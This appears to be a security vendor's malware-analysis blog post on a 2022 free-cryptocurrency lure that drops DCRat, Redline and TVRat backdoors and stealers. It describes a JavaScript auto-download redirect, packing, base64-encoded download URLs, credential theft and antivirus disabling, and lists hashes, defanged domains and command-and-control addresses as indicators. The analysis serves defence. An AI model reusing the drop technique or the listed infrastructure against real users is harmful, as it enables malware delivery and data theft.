FreeCryptoScam - A New Cryptocurrency Scam That Leads to Installation of Backdoors and Stealers

Introduction

In January 2022, the ThreatLabz research team identified a crypto scam, which we’ve dubbed “FreeCryptoScam.” In this scam, the threat actor targets crypto users by luring them with an offer of free cryptocurrency. When the victim downloads the payload, it leads to installation of multiple malware payloads on the victim’s system, allowing the threat actor to establish backdoors and/or steal user information. In this campaign, we see the Dark Crystal RAT (“DCRat”) being downloaded which further leads to Redline and TVRat being downloaded and executed onto the victim’s system.

This blog aims to explain various aspects of the campaign that the ThreatLabz team has uncovered during the investigation and technical analysis of the dropped payloads.

Website Analysis

In this campaign, threat actors host their malicious payload on either a new (Figure 1) or an old compromised web domain (Figure 2 & Figure 3). They use the below mechanisms to successfully drop the payload to the victim machine:

As soon as the user visits the website, the below javascript under a “script” tag gets executed to drop a payload:
“setTimeout(document.location.href=<link of the payload>, <milliseconds>)”
As soon as the user clicks on the button, the “href” property is used to drop the payload that consists of the payload link.

Figure 1: Newly spun up website hosting malicious payloads

Figure 2: Old compromised websites used for hosting malicious payload

It should be noted that:

The threat actor uses social engineering to drive successful payload execution, luring victims to install the dropped payload by using a message offering free cryptocurrency. 
The attack works across browsers, with the mechanism running the same way in Chrome, Internet Explorer, and Firefox. Depending on the browser settings, the payload will be automatically downloaded, or a pop-up window will ask the user to save the application on the system.
From the whois record, it is clear that the second domain (shown in Figure 2) is an old domain that has likely been compromised.

Figure 3: Whois report of the second domain [Credit: DomainTools]

Attack Chain

The figure below depicts the attack chain of two scenarios:

Figure 4: Attack chain

Technical Analysis

As shown in the above figure, we found two types of payload:

In Scenario 1, the payload was a downloader that connected to another malicious domain hosting second stage payloads—backdoors and stealers. In most cases, the downloaded files were DCRat, Redline, and TVRat.
In Scenario 2, the payload served the DCRat malware directly. 

[+] Scenario 1: Downloader DCRatLoader

For the purposes of analysis, we will look at the payload with MD5 hash: D3EF4EC10EE42994B313428D13B1B0BD which was protected by a well-known packer named Asprotect and given a fake certificate (as shown in the figure below).

Figure 5: Version information and digital certificate

After unpacking the file, we get a 48KB .NET executable file (MD5 = 469240D5A3B57C61F5F9F2B90F405999). This is a downloader consisting of base64 encoded urls and file paths (as shown in the figure below ).

Figure 6: Code of Unpacked file

These base64 encoded strings represent the URL paths for downloading stage 2 payloads as well as the file paths where these payloads will be dropped on the victim system.

Figure 7: URLs and File paths

Scenario 2: DCRat

The second scenario involved direct download of the DCRat payload which was also protected by Asprotect. Upon unpacking, we get a 664KB .NET executable file (MD5= 37F433E1843602B29EC641B406D14AFA) which is the DCRat malware (shown in the figure below).

Figure 8: Strings found in memory

Network Traffic:

Figure 9: Network traffic observed

Figure 10: Get request sent to C&C

In addition to the DCRat code, we also found stealer code inside the unpacked binary. This part of the code exhibited stealer characteristics, which are often used to exfiltrate sensitive user information. Not only did it steal the information from the infected system, but also disabled the antivirus protection (if found enabled). The code in the figure below showcases the type of data being exfiltrated:

Figure 11: Stealer code

Figure 12: Checks for antiviruses installed and disable them.

We saw the sample created a mutex, named, “\Sessions\1\BaseNamedObjects\865218dd0bef38bd584e8c4ea44a4b7e295cb6f3” where 865218dd0bef38bd584e8c4ea44a4b7e295cb6f3 is the SHA1(hash value) of the string “DCR_MUTEX-BZrxW3QvqgtvhEFCpLSr” and “DCR_MUTEX” is symbolic of DCRat malware.

Figure 13: Configuration of the DCRat

Zscaler Sandbox Detection

Downloader Payload

DCRat payload

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to the campaign at various levels with the following threat names:

Win32.Downloader.DCRat
Win32.Downloader.Redline
Win32.Downloader.TVrat
Win32.Backdoor.Dcrat
Win32.Backdoor.Redline
Win32.Backdoor.Tvrat

We haven’t categorized this campaign in association with any particular family because it’s a generic downloader that downloads other backdoors or stealers.

MITRE ATT&CK AND TTP Mapping

		ID
		
		
		Tactic
		
		
		Technique
		
	
	
		
		T1189 
		
		
		Drive-by Compromise
		
		
		Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. 
		
	
	
		
		T1140
		
		
		Deobfuscate/Decode Files or Information
		
		
		Strings and other data are obfuscated in the payload
		
	
	
		
		T1082
		
		
		System Information Discovery
		
		
		Sends processor architecture and computer name
		
	
	
		
		T1083
		
		
		File and Directory Discovery
		
		
		Upload file from the victim machine
		
	
	
		
		T1005 
		
		
		Data from Local System 
		
		
		Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. 
		
	
	
		
		T1222
		
		
		File Directory Permissions Modification
		
		
		Change directory permission to hide its file 
		
	
	
		
		T1555
		
		
		Credentials from password store
		
		
		Steal stored password
		
	
	
		
		T1056
		
		
		Keylogging
		
		
		Keylog of infected machine 
		
	
	
		
		T1055
		
		
		Process Injection
		
		
		Inject code into other processes

Indicators of Compromise

[+] MD5 Hashes

d3ef4ec10ee42994b313428d13b1b0bd

469240d5a3b57c61f5f9f2b90f405999

6bc6b19a38122b926c4e3a5872283c56

3da7cbb5e16c1f02522ff5e49ffc39e7

fdec732050d0b59d37e81453b746a5f3

d27dba475f35ee9983de3541d4a48bda

67364aac61276a7a4abb7b339733e72c

2e30e741aaa4047f0c114d22cb5f6494

22c4c7c383f1021c80f55ced63ed465c

1c5cf95587171cc0950a6e1be576fedc

37f433e1843602b29ec641b406d14afa

A6718d7cecc4ec8aeef273918d18aa19

fa80b7635babe8d75115ebcc3247ffff

e6d174dd2482042a0f24be7866f71b8d

53be54c4311238bae8cf2e95898e4b12

[+] Network Indicators:

wetranszfer[.]com

dogelab[.]net

verio-tx[.]net

benbest[.]org

gorillaboardwj[.]com

dogelab[.]net

d0me[.]net

pshzbnb[.]com

ghurnibd[.]com

theagencymg[.]com

gettingtoaha[.]com

squidgame[.]to

178[.]20[.]44[.]131:8842

92[.]38[.]241[.]101:36778

mirtonewbacker[.]com

94[.]103[.]81[.]146/php/Cpu4pythonserver/37Game/Video74Local/processtraffic.php?

Article Link: FreeCryptoScam